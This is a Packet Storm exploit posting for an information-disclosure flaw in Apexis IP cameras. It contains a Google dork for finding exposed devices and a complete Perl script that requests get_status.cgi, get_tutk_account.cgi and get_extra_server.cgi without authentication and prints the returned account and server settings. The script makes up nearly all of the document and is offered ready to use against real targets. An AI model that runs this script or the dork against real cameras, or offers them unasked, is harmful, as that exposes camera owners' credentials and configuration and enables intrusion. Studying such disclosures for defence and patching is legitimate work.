Apexis IP CAM suffers from a remote information disclosure vulnerability.
6241365038e03dc58eafa111dc2905a716e965fcb30f266cfc7b10a7e6f1c8a2http://pastebin.com/AJ9eQvXc
# Exploit Title: Apexis IP CAM - Full Info Disclosure
# Google Dork: inurl:"get_status.cgi"cgi-bin/
# Date: 01/06/2015
# Exploit Author: Sunplace Solutions - Soluciones Informáticas - #RE
Remoteexecution.net
# Vendor Homepage: http://www.apexis.com.cn/
# Tested on: Linux
[Exploit Code]
#!/usr/bin/perl
print "[ Apexis IP CAM - Full Info Disclosure ]\n";
print "[ Discovery by: Sunplace Solutions ]\n";
print "[ Exploit: Sunplace Solutions ]\n";
print "[ Greetz: www.remoteexecution.net - Daniel Godoy ]\n";
print "URL: ";
$url=<STDIN>;
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/35.0 (compatible; MSIE 5.0; Windows 7)');
chop($url);
if ($url eq "")
{
print 'URL dont empty!.'."\n";
}
else
{
$www = new LWP::UserAgent;
@path=split(/cgi-bin/,$url);
$content = $www->get($url) or error();
print "\n[x]Trying to pwn =>".$path[1]."\n";
print "Result: \n";
$pwn = $content->content;
$pwn=~ s/var//g;
$pwn=~ s/ //g;
$pwn=~ s/ret_//g;
print $pwn;
print "\n[x]Trying to pwn => /get_tutk_account\n";
print "Result: \n";
$content = $www->get($path[0]."cgi-bin/get_tutk_account.cgi") or error();
$pwn = $content->content;
$pwn=~ s/var//g;
$pwn=~ s/ret_//g;
$pwn=~ s/ //g;
print $pwn;
print "\n[x]Trying to pwn => /get_extra_server.cgi\n";
print "Result: \n";
$content = $www->get($path[0]."cgi-bin/get_extra_server.cgi") or error();
$pwn = $content->content;
$pwn=~ s/var//g;
$pwn=~ s/ret_//g;
$pwn=~ s/extra_//g;
$pwn=~ s/ //g;
print $pwn;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed